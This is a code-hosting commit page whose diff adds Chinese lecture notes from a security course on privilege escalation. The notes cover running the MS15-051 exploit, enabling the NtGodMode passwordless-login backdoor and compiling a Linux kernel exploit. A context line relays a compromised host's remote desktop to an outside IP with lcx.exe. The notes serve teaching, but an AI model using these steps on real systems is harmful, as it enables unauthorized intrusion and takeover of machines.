Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
OpenDocCN
mst-sec-lecture-notes
提交
df8ea540
M
mst-sec-lecture-notes
项目概览
OpenDocCN
/
mst-sec-lecture-notes
通知
0
Star
0
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
M
mst-sec-lecture-notes
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
提交
Issue看板
前往新版Gitcode,体验更适合开发者的 AI 搜索 >>
提交
df8ea540
编写于
3月 02, 2017
作者:
W
wizardforcel
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
提权v2
上级
715d0355
变更
1
隐藏空白更改
内联
并排
Showing
1 changed file
with
80 addition
and
0 deletion
+80
-0
漏洞篇 提权.md
漏洞篇 提权.md
+80
-0
未找到文件。
漏洞篇 提权.md
浏览文件 @
df8ea540
...
...
@@ -51,6 +51,16 @@
![](
http://ww3.sinaimg.cn/large/841aea59jw1fb4cdbd37oj20g20dn0t3.jpg
)
现在我们查看远程连接的端口,首先执行
`tasklist /svc`
,寻找
`TermService`
:
![](
http://upload-images.jianshu.io/upload_images/118142-7148e693db4563e4.jpg
)
我们看到它的 PID 为 1504。之后执行
`netstat -ano`
:
![](
http://upload-images.jianshu.io/upload_images/118142-788dc8fc6737406e.jpg
)
寻找 PID 为 1504 的一行,可以看到它的端口是 3389。
需要远程连接的时候,输入刚刚创建的用户名和密码就可以了。
## 突破限制
...
...
@@ -122,3 +132,73 @@ lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389
等待一会儿之后,我们成功连接了肉鸡的远程桌面:
![](
http://ww1.sinaimg.cn/large/841aea59jw1fb56nbetaaj20j50cjgll.jpg
)
## Windows Exp 提权
Exp 提权用于普通方式不好用的时候。
首先我们通过
`systeminfo`
查看补丁:
![](
http://upload-images.jianshu.io/upload_images/118142-db62a3154e7c0d45.jpg
)
我们可以看到它安装了
`Q147222`
。
然后我们使用
[
GetRoot Tools
](
https://github.com/gh0stkey/GetRoot-Tools
)
工具,打开它,主界面是这样的:
![](
http://upload-images.jianshu.io/upload_images/118142-420f6ca77da5d0fb.jpg
)
我们选中上面的 Windows 2003,然后把
`[01]: Q147222`
复制到上方的输入框中。之后点击
`Search`
:
![](
http://upload-images.jianshu.io/upload_images/118142-9b5f1021c8dc0a1a.jpg
)
这就是我们可以使用的 Exp。我们随便选择一个,比如
`MS15-051`
。我们可以在课件中的 MS 提权集(
`提权-扩大战果/扩大战果-提权之Exploit提权&上帝之门(Windows).zip -> ms提权集/ms15-051/ms15-051`
)中找到它。
我们需要根据系统的版本来选择 Exp,这里系统是 32 位的,我们就应该选择
`Win32/32.exe`
。上传之后,我们可以使用
`dir`
命令在目录中看到它:
![](
http://upload-images.jianshu.io/upload_images/118142-3f57e43595b04f20.jpg
)
它的使用方法是
`<exp.exe> "<cmd 命令>"`
,例如,我们执行
`net user`
:
![](
http://upload-images.jianshu.io/upload_images/118142-1f48ecf494eb4ffb.jpg
)
我们可以看到命令执行成功。
## 上帝之门
上帝之门 Exp 用于开启 Windows 的“上帝模式”,即任意账户无密码登录。它需要能上传并且执行 EXE 文件。使用方法为
`NtGodMode.exe [ON|OFF]`
。我们可以在课件中(
`提权-扩大战果/扩大战果-提权之Exploit提权&上帝之门(Windows).zip -> NtGodMode.exe`
)找到它。
上传之后,执行
`NtGodMode.exe ON`
:
![](
http://upload-images.jianshu.io/upload_images/118142-7ab4611985b296cc.jpg
)
然后通过远程连接登录目标主机,将用户名输入为
`admin`
,密码任意填写。
![](
http://upload-images.jianshu.io/upload_images/118142-11fc859cbaab9b5a.jpg
)
可以进入目标主机。
![](
http://upload-images.jianshu.io/upload_images/118142-32dd69303a92b072.jpg
)
注意,必须是输入已有用户名,不存在的用户名是不行的。
## Linux Exp 提权
首先根据
`uname -a`
查看内核版本,之后根据内核版本找 Exp:
![](
http://upload-images.jianshu.io/upload_images/118142-5ee0c8d4aa934af1.png
)
之后我们执行以下命令来编译:
```
gcc -pthread exp.c -o exp
```
然后执行
`./exp`
来执行 Exp。我们一开始的用户可能是
`xxx@yyy`
,执行之后就变成了
`root@yyy`
,这样就算提权成功。
## 附录
+
[
米斯特白帽子培训第二期视频教程
](
http://bbs.ichunqiu.com/thread-19368-1-1.html
)
+
[
Kali Linux 秘籍 第七章 权限提升
](
http://www.jianshu.com/p/0c26e7eaf226
)
+
[
CVE-2016-5195 脏牛漏洞
](
http://m.bobao.360.cn/learning/detail/3123.html
)
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录